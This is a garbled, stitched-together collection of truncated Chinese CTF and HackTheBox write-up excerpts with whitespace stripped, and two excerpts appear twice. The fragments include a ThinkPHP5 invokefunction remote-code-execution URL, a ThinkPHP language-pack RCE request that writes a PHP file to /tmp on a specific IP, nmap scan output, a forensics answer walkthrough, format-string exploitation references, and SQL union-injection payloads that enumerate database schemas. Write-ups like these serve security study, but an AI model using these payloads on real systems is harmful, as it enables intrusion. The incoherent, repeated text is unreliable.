战队的每位同学辛苦了~Web:NaclPwn:zsNickReverse:kcldahMisc:mochu7最终第15名文章目录Webpdf_converterpdf_converter_revengePwnfourReverseeasyREMiscsecretofbkfishGe9ian'sGirlWebpdf_converter这题非预期了,有个Thinkphp5的代码执行未修复http://6399e5ef-2a0f-4320-a88d-1eac8ce4761e.node4.buuoj.cn:81/index.php?s=index/think\app/invokefunction&fu
web1Thinkphplang多语言RCE漏洞,直接打GET/index.php?+config-create+/+/tmp/keep.phpHTTP/1.1Host:47.98.124.175:8080Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/108.0.0.0Safari/537.36Accept:text/html,application/xhtml+x
Socketnmap┌──(root💀kali)-[~]└─#nmap-A10.10.11.206StartingNmap7.93(https://nmap.org)at2023-03-2710:53EDTNmapscanreportfor10.10.11.206Hostisup(0.72slatency).Notshown:998closedtcpports(reset)PORTSTATESERVICEVERSION22/tcpopensshOpenSSH8.9p1Ubuntu3ubuntu0.1(UbuntuLinux;protocol2.0)|ssh-hostkey:|2564fe3a6
Codernmap结果┌──(root💀kali)-[~]└─#nmap-A10.10.11.207StartingNmap7.93(https://nmap.org)at2023-04-0222:06EDTNmapscanreportfor10.10.11.207Hostisup(0.085slatency).Notshown:987closedtcpports(reset)PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus80/tcpopenhttpMicrosoftIIShttpd10.0|_http-server-header:Mi
检材一问的是检材1的sha256,可以直接对检材计算,如果对磁盘做镜像的话,得到另外一个hash值(此处也算对)jar包存放目录,一是可以看历史命令,二是搜索,使用命令fina/-name"*.jar",查找所有以jar结尾的文件7000端口的文件名。在历史命令中,可以看到使用了一个shstart_web.sh的脚本,后来通过rm的命令给删掉了,所以需要过滤历史命令。思路一是找到所有jar包,查看配置文件的启动端口即可,如果没有则查看所有前端vue的config,看是否启动在7000端口。正确答案为cloud.jar管理后台对应端口,通过查看历史命令,把前端启动起来,可得端口为9090网站前台
检材一问的是检材1的sha256,可以直接对检材计算,如果对磁盘做镜像的话,得到另外一个hash值(此处也算对)jar包存放目录,一是可以看历史命令,二是搜索,使用命令fina/-name"*.jar",查找所有以jar结尾的文件7000端口的文件名。在历史命令中,可以看到使用了一个shstart_web.sh的脚本,后来通过rm的命令给删掉了,所以需要过滤历史命令。思路一是找到所有jar包,查看配置文件的启动端口即可,如果没有则查看所有前端vue的config,看是否启动在7000端口。正确答案为cloud.jar管理后台对应端口,通过查看历史命令,把前端启动起来,可得端口为9090网站前台
声明:本文用途为供自己学习参考文章一:CSDN-云啾啾啾(作者)-buuctf——[第五空间2019决赛]PWN51参考文章二:CSDN-Mokapeng(作者)-[第五空间2019决赛]PWN5——两种解法参考文章三:CSDN-lifanxin(作者)-CTFpwn题之格式化字符串漏洞详解参考文章四:知乎-看雪(作者)-PWN入门-格式化字符串漏洞参考文章五:简书-杰森任(作者)-PWN格式化字符串漏洞1(基础知识)参考文章七:CSDN-Marx_ICB(作者)-【PWN】格式化字符串漏洞原理参考文章八:CSDN-n19hT(作者)-gdb调试|pwndbg+pwndbg联合使用目录一、思路
文章目录WEB签到easyzphpezpyMISCbyteMuisc有趣的PDFWEB签到?id=-1'unionselect1,(selectgroup_concat(schema_name)frominformation_schema.schemata),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='SQL01'),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(column_
文章目录WEB签到easyzphpezpyMISCbyteMuisc有趣的PDFWEB签到?id=-1'unionselect1,(selectgroup_concat(schema_name)frominformation_schema.schemata),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='SQL01'),3,4,5--+?id=-1'unionselect1,(selectgroup_concat(column_
2017insomni'hackwheelofrobotsWriteup0x00前言题目地址:wheelofrobots程序保护:0x01程序分析1.1mainmain程序如下图。进入程序后,先显示菜单,然后用户输入,根据选项调用相应的功能函数。菜单函数如下图,该程序主要有四个功能:添加、删除、修改、输出。选项读取函数如下,使用read()向a1处读入len长度,然后调用atoi将其转化为数字。1.2add程序一共有6个机器人可供选择,用数字1,2,3,4,5,6来选择,根据用户选择执行相应的添加流程。总共添加的机器人轮子数不超过2,即最多添加3个机器人。机器人1Tinny的分配即case1部